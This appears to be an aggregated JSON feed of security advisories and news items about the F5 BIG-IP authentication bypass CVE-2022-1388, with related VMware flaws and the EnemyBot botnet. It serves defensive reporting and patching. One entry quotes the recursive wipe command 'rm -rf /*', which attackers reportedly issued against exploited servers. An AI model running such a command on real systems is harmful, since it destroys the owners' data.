{"hivepro": [{"lastseen": "2022-05-10T17:36:31", "description": "THREAT LEVEL: Amber.\n\nLast week, F5 patched a vulnerability tracked as CVE-2022-1388, soon after a successful proof-of-concept (PoC) was developed by security researchers, making it susceptible to further exploitation. This authentication bypass vulnerability affects the iControl REST component in BIG-IP systems. An unauthenticated attacker could use this flaw to gain initial access and control of a vulnerable machine, allowing remote code execution.\n\nThis vulnerability has been fixed in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6 or 13.1.5. Organizations that are unable to update their versions are advised to follow these mitigations:\n\n * Blocking iControl REST access through the self IP address\n * Blocking iControl REST access through the management interface\n * Modifying the BIG-IP httpd configuration\n\nPotential MITRE ATT&CK TTPs are:\n\n * TA0042: Resource Development\n * T1588: Obtain Capabilities\n * T1588.005: Obtain Capabilities: Exploits\n * T1588.006: Obtain Capabilities: Vulnerabilities\n * TA0001: Initial Access\n * T1190: Exploit Public-Facing Application\n\nPatch Links: https://support.f5.com/csp/article/K23605346\n\nReferences: https://twitter.com/ptswarm/status/1522873828896034816", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T13:47:42", "type": "hivepro", "title": "Have you patched this actively exploited BIG-IP vulnerability?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T13:47:42", "id": "HIVEPRO:8D92547900FABA151C6C4CFE3CF5B9A9", "href": "https://www.hivepro.com/have-you-patched-this-actively-exploited-big-ip-vulnerability/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-05-07T11:27:47", "description": "F5 has released security advisories on vulnerabilities affecting multiple products, including various versions of BIG-IP. Included in the release is [an advisory for CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), which allows undisclosed requests to bypass the iControl REST authentication in BIG-IP. 
An attacker could exploit CVE-2022-1388 to take control of an affected system.\n\nCISA encourages users and administrators to review the F5 webpage, [Overview of F5 vulnerabilities (May 2022)](<https://support.f5.com/csp/article/K55879220>), and apply the necessary updates or workarounds.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T00:00:00", "type": "cisa", "title": "F5 Releases Security Advisories Addressing Multiple Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-04T00:00:00", "id": "CISA:CE531246BF5FC97924EF93C811BBA0FF", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2022/05/04/f5-releases-security-advisories-addressing-multiple", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-19T11:28:29", "description": "CISA and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have released the joint Cybersecurity Advisory [Threat Actors Exploiting F5 BIG-IP CVE-2022-1388](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138a>) in response to active exploitation of CVE-2022-1388, which affects F5 Networks BIG-IP devices. The vulnerability allows an unauthenticated actor to gain control of affected systems via the management port or self-IP addresses.\n\nCISA encourages users and administrators to review the joint advisory for detection methods and mitigations, which include updating F5 BIG-IP software, or, if unable to immediately update, applying temporary workarounds.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T00:00:00", "type": "cisa", "title": "Threat Actors Exploiting F5 BIG IP CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-18T00:00:00", "id": "CISA:ADBA13BCB35A603303E6E4549200157F", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/threat-actors-exploiting-f5-big-ip-cve-2022-1388", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-12T14:58:41", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) has [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/10/cisa-adds-one-known-exploited-vulnerability-catalog>) the recently disclosed F5 BIG-IP flaw to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) following reports of [active abuse](<https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html>) in the wild.\n\nThe flaw, assigned the identifier [CVE-2022-1388](<https://thehackernews.com/2022/05/researchers-develop-rce-exploit-for.html>) (CVSS score: 9.8), concerns a [critical bug](<https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/>) in the BIG-IP iControl REST endpoint that provides an unauthenticated adversary with a method to execute arbitrary system commands.\n\n\"An attacker can use this vulnerability to do just about anything they want to on the vulnerable server,\" Horizon3.ai [said](<https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/>) in a report. \"This includes making configuration changes, stealing sensitive information and moving laterally within the target network.\"\n\nPatches and mitigations for the flaw were announced by F5 on May 4, but it has been [subjected](<https://twitter.com/1ZRR4H/status/1523572874061422593>) to [in-the-wild](<https://twitter.com/bad_packets/status/1523740777406377985>) [exploitation](<https://twitter.com/sans_isc/status/1523732455546494976>) over the past week, with attackers attempting to install a web shell that grants backdoor access to the targeted systems.\n\n\"Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase,\" Rapid7 security researcher Ron Bowes [noted](<https://www.rapid7.com/blog/post/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/>). 
\"Widespread exploitation is somewhat mitigated by the [small number](<https://twitter.com/Junior_Baines/status/1522205355287228416>) of internet-facing F5 BIG-IP devices.\"\n\nWhile F5 has since revised its advisory to include what it believes to be \"reliable\" indicators of compromise, it has [cautioned](<https://support.f5.com/csp/article/K23605346>) that \"a skilled attacker can remove evidence of compromise, including log files, after successful exploitation.\"\n\nTo make matters worse, [evidence](<https://twitter.com/sans_isc/status/1523741896707043328>) has [emerged](<https://twitter.com/GossiTheDog/status/1524160730114764801>) that the remote code execution flaw is being used to completely erase targeted servers as part of destructive attacks to render them inoperable by issuing an \"[rm -rf /*](<https://en.wikipedia.org/wiki/Rm_\\(Unix\\)#Syntax>)\" command that recursively deletes all files.\n\n\"Given that the web server runs as root, this should take care of any vulnerable server out there and destroy any vulnerable BIG-IP appliance,\" SANS Internet Storm Center (ISC) [said](<https://twitter.com/sans_isc/status/1523742317059792896>) on Twitter.\n\nIn light of the potential impact of this vulnerability, Federal Civilian Executive Branch (FCEB) agencies have been mandated to patch all systems against the issue by May 31, 2022.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T04:42:00", "type": "thn", "title": "CISA Urges Organizations to Patch Actively Exploited F5 BIG-IP Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-12T13:47:13", "id": "THN:A2437FEF2D679B5454DA71E850FADEA9", "href": "https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-10T06:22:40", "description": "Days after F5 released patches for a critical remote code execution vulnerability 
affecting its BIG-IP family of products, security researchers are warning that they were able to create an exploit for the shortcoming.\n\nTracked as [CVE-2022-1388](<https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html>) (CVSS score: 9.8), the flaw relates to an iControl REST authentication bypass that, if successfully exploited, could lead to remote code execution, allowing an attacker to gain initial access and take control of an affected system.\n\nThis could range anywhere from deploying cryptocurrency miners to dropping web shells for follow-on attacks, such as information theft and ransomware.\n\n\"We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP,\" cybersecurity company Positive Technologies [said](<https://twitter.com/ptswarm/status/1522873828896034816>) in a tweet on Friday. \"Patch ASAP!\"\n\nThe critical security vulnerability impacts the following versions of BIG-IP products -\n\n * 16.1.0 - 16.1.2\n * 15.1.0 - 15.1.5\n * 14.1.0 - 14.1.4\n * 13.1.0 - 13.1.4\n * 12.1.0 - 12.1.6\n * 11.6.1 - 11.6.5\n\nFixes are available in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5. Firmware versions 11.x and 12.x will not receive security updates and users relying on those versions should consider upgrading to a newer version or applying the workarounds -\n\n * Block iControl REST access through the self IP address\n * Block iControl REST access through the management interface, and\n * Modify the BIG-IP httpd configuration\n\nLast month, cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. 
jointly [warned](<https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html>) that threat actors are aggressively targeting \"newly disclosed critical software vulnerabilities against broad target sets, including public and private sector organizations worldwide.\"\n\nWith the F5 BIG-IP flaw found trivial to exploit, malicious hacking crews are expected to follow suit, making it imperative that affected organizations move quickly to apply the patches.\n\n**_Update:_** Security researcher Kevin Beaumont has [warned](<https://twitter.com/GossiTheDog/status/1523222846474014720>) of active exploitation attempts detected in the wild, while simultaneously [alerting](<https://twitter.com/GossiTheDog/status/1523566937414193153>) to the availability of a public proof-of-concept (PoC) for the code execution flaw.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T03:06:00", "type": "thn", "title": "Researchers Develop RCE Exploit for the Latest F5 BIG-IP Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388"], "modified": "2022-05-10T05:05:56", "id": "THN:A17A3E26BF0B1DE93C5D89D6B6107FE3", "href": "https://thehackernews.com/2022/05/researchers-develop-rce-exploit-for.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-19T06:22:57", "description": "VMware has issued patches to contain [two security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks.\n\nThe first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication.\n\nCVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local privilege escalation that could enable an attacker with local access to elevate privileges to the \"root\" user on vulnerable virtual appliances.\n\n\"It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments,\" VMware [said](<https://core.vmware.com/vmsa-2022-0014-questions-answers-faq>).\n\nThe disclosure follows a [warning](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related>) from the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 \u2014 two other VMware flaws that were [fixed](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>) [early last month](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>) \u2014 separately and in combination.\n\n\"An unauthenticated actor with network access to the web interface leveraged CVE-2022-22954 to execute an arbitrary shell command as a VMware user,\" it said. \"The actor then exploited CVE-2022-22960 to escalate the user's privileges to root. With root access, the actor could wipe logs, escalate permissions, and move laterally to other systems.\"\n\nOn top of that, the cybersecurity authority noted that threat actors have deployed post-exploitation tools such as the Dingo J-spy web shell in at least three different organizations.\n\nIT security company Barracuda Networks, in an [independent report](<https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/>), said it has observed consistent probing attempts in the wild for CVE-2022-22954 and CVE-2022-22960 soon after the shortcomings became public knowledge on April 6.\n\nMore than three-fourths of the attacker IPs, about 76%, are said to have originated from the U.S., followed by the U.K. 
(6%), Russia (6%), Australia (5%), India (2%), Denmark (1%), and France (1%).\n\nSome of the exploitation attempts recorded by the company involve botnet operators, with the threat actors leveraging the flaws to deploy variants of the [Mirai](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>) distributed denial-of-service (DDoS) malware.\n\nThe issues have also prompted CISA to issue an [emergency directive](<https://www.cisa.gov/emergency-directive-22-03>) urging federal civilian executive branch (FCEB) agencies to apply the updates by 5 p.m. EDT on May 23 or disconnect the devices from their networks.\n\n\"CISA expects threat actors to quickly develop a capability to exploit these newly released vulnerabilities in the same impacted VMware products,\" the agency said.\n\nThe patches arrive a little over a month after the company rolled out an update to resolve a critical security flaw in its Cloud Director product ([CVE-2022-22966](<https://thehackernews.com/2022/04/critical-vmware-cloud-director-bug.html>)) that could be weaponized to launch remote code execution attacks.\n\n### CISA warns of active exploitation of F5 BIG-IP CVE-2022-1388\n\nIt's not just VMware that's under fire. The agency has also released a follow-up advisory with regard to the active exploitation of [CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>) (CVSS score: 9.8), a recently disclosed remote code execution flaw affecting BIG-IP devices.\n\nCISA [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138a>) it expects to \"see widespread exploitation of unpatched F5 BIG-IP devices (mostly with publicly exposed management ports or self IPs) in both government and private sector networks.\"\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T05:48:00", "type": "thn", "title": "VMware Releases Patches for New Vulnerabilities Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22966", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T05:48:33", "id": "THN:8E366D56AB2756B4DE53AEEA90675132", "href": "https://thehackernews.com/2022/05/vmware-releases-patches-for-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:24", "description": 
"Cloud security and application delivery network ([ADN](<https://en.wikipedia.org/wiki/Application_delivery_network>)) provider F5 on Wednesday released patches to contain 43 bugs spanning its products.\n\nOf the [43 issues addressed](<https://support.f5.com/csp/article/K55879220>), one is rated Critical, 17 are rated High, 24 are rated Medium, and one is rated Low in severity.\n\nChief among the flaws is [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), which carries a CVSS score of 9.8 out of a maximum of 10 and stems from a lack of authentication check, potentially allowing an attacker to take control of an affected system.\n\n\"This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services,\" F5 said in an advisory. \"There is no data plane exposure; this is a control plane issue only.\"\n\nThe security vulnerability, which the company said was discovered internally, affects BIG-IP products with the following versions -\n\n * 16.1.0 - 16.1.2\n * 15.1.0 - 15.1.5\n * 14.1.0 - 14.1.4\n * 13.1.0 - 13.1.4\n * 12.1.0 - 12.1.6\n * 11.6.1 - 11.6.5\n\nPatches for the iControl REST authentication bypass flaw have been introduced in versions 17.0.0, 16.1.2.2, 15.1.5.1, 14.1.4.6, and 13.1.5. 
Other F5 products such as BIG-IQ Centralized Management, F5OS-A, F5OS-C, and Traffix SDC are not vulnerable to CVE-2022-1388.\n\nF5 has also offered temporary workarounds until the fixes can be applied -\n\n * Block iControl REST access through the self IP address\n * Block iControl REST access through the management interface\n * Modify the BIG-IP httpd configuration\n\nOther notable bugs resolved as part of the update include those that could permit an authenticated attacker to bypass Appliance mode restrictions and execute arbitrary JavaScript code in the context of the currently logged-in user.\n\nWith F5 appliances widely deployed in enterprise networks, it's imperative that organizations move quickly to apply the patches to [prevent threat actors](<https://thehackernews.com/2021/08/f5-releases-critical-security-patches.html>) from exploiting the attack vector for initial access.\n\nThe security fixes come as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added five new flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/04/cisa-adds-five-known-exploited-vulnerabilities-catalog>) based on evidence of active exploitation -\n\n * [**CVE-2021-1789**](<https://nvd.nist.gov/vuln/detail/CVE-2021-1789>) \\- Apple Multiple Products [Type Confusion Vulnerability](<https://thehackernews.com/2022/01/hackers-infect-macos-with-new-dazzlespy.html>)\n * [**CVE-2019-8506**](<https://nvd.nist.gov/vuln/detail/CVE-2019-8506>) \\- Apple Multiple Products Type Confusion Vulnerability\n * [**CVE-2014-4113**](<https://nvd.nist.gov/vuln/detail/CVE-2014-4113>) \\- Microsoft Win32k Privilege Escalation Vulnerability\n * [**CVE-2014-0322**](<https://nvd.nist.gov/vuln/detail/CVE-2014-0322>) \\- Microsoft Internet Explorer Use-After-Free Vulnerability\n * [**CVE-2014-0160**](<https://nvd.nist.gov/vuln/detail/CVE-2014-0160>) \\- OpenSSL Information Disclosure Vulnerability\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T02:38:00", "type": "thn", "title": "F5 Warns of a New Critical BIG-IP Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160", "CVE-2014-0322", "CVE-2014-4113", "CVE-2019-8506", "CVE-2021-1789", "CVE-2022-1388"], "modified": "2022-05-05T02:38:14", "id": "THN:87650195BF482879C3C258B474B11411", "href": "https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-31T05:56:10", "description": "A nascent 
Linux-based botnet named **Enemybot** has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).\n\n\"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,\" AT&T Alien Labs [said](<https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers>) in a technical write-up published last week. \"Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.\"\n\nFirst disclosed by [Securonix](<https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/>) in March and later by [Fortinet](<https://thehackernews.com/2022/04/new-enemybot-ddos-botnet-borrows.html>), Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.\n\nEnemybot, which is capable of carrying out [DDoS attacks](<https://en.wikipedia.org/wiki/Denial-of-service_attack>), draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -\n\n * A Python module to download dependencies and compile the malware for different OS architectures\n * The core botnet section\n * An obfuscation segment designed to encode and decode the malware's strings, and\n * A command-and-control functionality to receive attack commands and fetch additional payloads\n\n\"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command,\" the researchers said, pointing to a new \"adb_infect\" function. 
ADB refers to [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>), a command-line utility used to communicate with an Android device.\n\nAlso incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.\n\nBesides the [Log4Shell vulnerabilities](<https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html>) that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access ([CVE-2022-22954](<https://thehackernews.com/2022/04/vmware-releases-patches-for-critical.html>)), and F5 BIG-IP ([CVE-2022-1388](<https://thehackernews.com/2022/05/cisa-urges-organizations-to-patch.html>)) as well as weaknesses in WordPress plugins like Video Synchro PDF.\n\nOther weaponized security shortcomings are below -\n\n * [**CVE-2022-22947**](<https://thehackernews.com/2022/05/new-sysrv-botnet-variant-hijacking.html>) (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway\n * [**CVE-2021-4039**](<https://nvd.nist.gov/vuln/detail/CVE-2021-4039>) (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware\n * [**CVE-2022-25075**](<https://nvd.nist.gov/vuln/detail/CVE-2022-25075>) (CVSS score: 9.8) - 
A command injection vulnerability in TOTOLink A3000RU wireless router\n * [**CVE-2021-36356**](<https://nvd.nist.gov/vuln/detail/CVE-2021-36356>) (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware\n * [**CVE-2021-35064**](<https://nvd.nist.gov/vuln/detail/CVE-2021-35064>) (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare\n * [**CVE-2020-7961**](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>) (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal\n\nWhat's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. \"I assume no responsibility for any damages caused by this program,\" the project's README file [reads](<https://github.com/freakanonymous/enemy>). \"This is posted under Apache license and is also considered art.\"\n\n\"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,\" the researchers said.\n\n\"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.\"\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-30T10:30:00", "type": "thn", "title": "EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7961", "CVE-2021-35064", "CVE-2021-36356", "CVE-2021-4039", "CVE-2022-1388", "CVE-2022-22947", "CVE-2022-22954", "CVE-2022-25075"], "modified": "2022-05-31T04:11:39", "id": "THN:A4284A3BA2971D8DA287C1A8393ECAC8", "href": "https://thehackernews.com/2022/05/enemybot-linux-botnet-now-exploits-web.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-05-09T17:29:08", "description": "The Australian Cyber Security Centre (ACSC) has announced it is aware of the existence of Proof of Concept (PoC) code exploiting a F5 Security Advisory Addressing Multiple Vulnerabilities in its BIG-IP Product 
